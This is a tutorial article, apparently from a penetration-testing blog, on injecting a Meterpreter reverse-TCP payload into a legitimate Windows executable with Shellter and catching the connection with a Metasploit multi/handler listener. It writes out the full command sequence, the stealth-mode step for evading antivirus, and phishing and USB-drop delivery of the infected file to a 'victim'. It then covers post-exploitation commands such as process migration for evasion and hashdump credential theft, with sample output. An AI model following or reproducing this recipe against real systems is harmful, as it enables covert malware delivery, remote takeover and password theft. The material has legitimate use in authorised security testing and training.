Injecting Shellcode Inside Windows Executables with Shellter and Metasploit

Injecting shellcode into a Windows executable file (.exe) is one of the most effective techniques in the penetration testing toolkit for gaining access to a victim's system. This method is used extensively by both ethical hackers and cybercriminals alike to carry out remote code execution by hiding malicious payloads within seemingly harmless software. By embedding a malicious payload inside an executable file, attackers can circumvent security measures, evade detection, and gain persistence on a target system.

In this article, we will take a deep dive into the process of injecting shellcode into Windows applications using Shellter and Metasploit. We will also explore the advanced techniques involved, explain each command in detail, and provide you with practical insights into this sophisticated attack vector.

1. What is Shellcode Injection?

Before we get into the nuts and bolts of the attack, let's first understand the core concept of shellcode injection.

What is Shellcode?

Shellcode is a small piece of code that is designed to exploit a specific vulnerability in a system and execute arbitrary commands. The name "shellcode" originates from its early use in opening a remote shell on a compromised machine, allowing attackers to run commands as if they were sitting in front of the system.

Shellcode Injection Overview

In a typical shellcode injection attack, malicious code is introduced into a running program or an executable file. The goal is to make the injected code execute when the application is run by the victim. This is often done by leveraging a vulnerability or exploiting flaws in the application, such as buffer overflows or improper validation of user input.

By injecting shellcode, the attacker can:

• Open a reverse shell back to their machine, allowing remote control.
• Execute commands or install backdoors for future access.
• Exploit system vulnerabilities to escalate privileges or pivot within the network.

Why Use Shellcode Injection in Executables?

Injecting shellcode into Windows executable files is a common technique because executables are trusted by default by both users and operating systems. Users rarely think twice before running an executable, especially when the file appears legitimate. As a result, by embedding malicious payloads within these files, attackers can bypass security measures and trick users into executing malicious code.

2. Why Shellter and Metasploit?

Shellter: The Power of Stealth

Shellter is a tool specifically designed for injecting shellcode into Windows executables while preserving the original functionality of the program. What sets Shellter apart from other tools is its ability to inject shellcode in a way that avoids detection by many antivirus and security programs. This is achieved through its stealth mode, which manipulates the executable to avoid the signatures that would normally trigger antivirus software.

Shellter supports a variety of payloads, including reverse shells and bind shells, with options for both manual and automatic injection. For this tutorial, we'll be using the Meterpreter reverse shell payload, which is one of the most commonly used payloads in penetration testing.

Metasploit: The Framework for Exploitation

Metasploit is a comprehensive exploitation framework that allows you to automate attacks, exploit vulnerabilities, and deliver payloads to compromised systems. Once the payload is injected into the executable, you can use Metasploit to create a listener that will wait for the victim's system to connect back to you once they execute the infected .exe.

Metasploit is flexible, with a wealth of modules and payloads that can be tailored to your attack. The Meterpreter payload, for instance, is a powerful tool for post-exploitation, offering features such as remote control, privilege escalation, and lateral movement.

3. Prerequisites and Environment Setup

Before jumping into the attack itself, you need to set up the appropriate tools and environment.

Installing Shellter

Shellter can be easily installed on any Linux-based system, such as Kali Linux. Here’s how to get started:

1. Update your package list:

   sudo apt-get update
   

2. Install Shellter:

   sudo apt-get install shellter
   

3. Verify installation:

   shellter
   

Once installed, Shellter will run in interactive mode, where you can begin the process of injecting the payload.

Installing Metasploit

Metasploit is likely pre-installed in most penetration testing distributions, but if it isn't, you can install it as follows:

1. Update your package list:

   sudo apt-get update
   

2. Install Metasploit:

   sudo apt-get install metasploit-framework
   

3. Launch Metasploit:

   msfconsole
   

4. Step-by-Step Guide to Payload Injection

Now, let’s walk through the process of injecting a payload into an executable using Shellter.

Choosing the Target Executable

The first step in any attack is choosing the target. In our case, let's assume you have a Windows executable file called FileName.exe. This file is a legitimate program that, when modified, will run the injected payload. Start Shellter with the command:

shellter

You will be prompted to choose the mode of operation:

Choose Operation Mode
Auto/Manual (A/M/H): A (Press "A" for Auto)

In Auto Mode, Shellter will automatically identify the best way to inject the payload. Now, specify the location of the target executable:

PE Target: /root/Desktop/FileName.exe

Selecting the Payload

After choosing the target executable, Shellter will ask you to select a payload. Shellter provides several payload options, such as reverse shells, bind shells, and WinExec.

For this attack, we will use the Meterpreter reverse TCP payload, a staple of penetration testing:

********** *Payloads* **********
[1] Meterpreter_Reverse_TCP[stager]
[2] Meterpreter_Reverse_HTTP[stager]
[3] Meterpreter_Reverse_HTTPS[stager]
[4] Meterpreter_Bind_TCP[stager]
[5] Shell_Reverse_TCP[stager]
[6] Shell_Bind_TCP[stager]
[7] WinExec[stager]

Use a listed Payload or Custom? (L/C/H): L (Press "L" for List)

Select Meterpreter_Reverse_TCP by its index (1):

Select payload by index: 1

Configuring the Payload Options

Next, you will need to configure the LHOST (your local IP address) and LPORT (the port on which Metasploit will listen for incoming connections).

SET LHOST: 192.168.1.100
SET LPORT: 443

The LHOST is the IP address of your machine that the victim's system will connect back to. The LPORT is the port number you want to use to listen for the connection.

Stealth Mode: Bypassing Antivirus Detection

In this next step, you will be prompted to enable Stealth Mode, which is a key feature of Shellter. Stealth Mode modifies the injected code to help bypass antivirus software:

Enable Stealth Mode? (Y/N/H): Y (Press "Y" for Yes)

Once this option is enabled, Shellter will proceed to inject the payload into the executable while keeping it undetectable by most antivirus programs.

5. Setting Up the Listener in Metasploit

With the payload successfully injected into the .exe file, it's time to set up the listener in Metasploit.

1. Open Metasploit and load the exploit/multi/handler module:

   msfconsole
   use exploit/multi/handler
   

2. Set the PAYLOAD option to windows/meterpreter/reverse_tcp:

   set PAYLOAD windows/meterpreter/reverse_tcp
   

3. Set your LHOST to the same IP address as before:

   set LHOST 192.168.1.100
   

4. Set the LPORT to match the port specified earlier:

   set LPORT 443
   

5. Start the listener:

   run
   

At this point, Metasploit is listening on port 443 for any incoming connections from the infected executable.

6. Delivering the Payload and Exploiting the Victim

Now that your payload is injected and your listener is running, you need to deliver the infected executable to the victim. There are many methods for delivering the payload, such as:

• Phishing: Sending the infected file via email disguised as an important document or software update.
• USB Drops: Physically delivering the infected file through removable media like USB drives.
• Social Engineering: Encouraging the victim to download and run the file from a file-sharing service.

Once the victim executes the infected .exe, the payload will connect back to your Metasploit listener. You will see the following output in your Metasploit console:

[*] Started reverse TCP handler on 192.168.1.100:443
[*] Sending stage (1113208 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.101:4444) at 2025-05-08 10:32:50 +0000

Post-Exploitation with Meterpreter

Once you’ve successfully compromised the target system, you now have access to the Meterpreter session, which provides a wealth of powerful commands for further exploitation:

1. ps: Lists all running processes on the victim machine.

   meterpreter> ps
   

   Example output:

   Process List
   ================
   PID   Name            Path
   -  -            -
   1234  explorer.exe    C:\Windows\explorer.exe
   4321  cmd.exe         C:\Windows\System32\cmd.exe
   

2. migrate: Migrate the Meterpreter session to another process (e.g., explorer.exe) to evade detection:

   meterpreter> migrate 1234
   

3. getuid: Display the current user context:

   meterpreter> getuid
   

   Example output:

   Server username: NT AUTHORITY\SYSTEM
   

4. hashdump: Dump password hashes from the victim's system:

   meterpreter> hashdump
   

   Example output:

   Administrator:500:4b1f7c3481f61bc5f84858f4b85c34b1:eeaf9e93d897c3fcd45cb72d68b5ae91:::
   

Conclusion

Injecting shellcode into Windows executables with Shellter and Metasploit is a powerful and stealthy technique for gaining remote access to a system. This method allows you to deliver payloads that can evade detection, providing attackers with persistence and control over the compromised system. By understanding how to use these tools effectively, you can both defend against these attacks and perform effective penetration tests.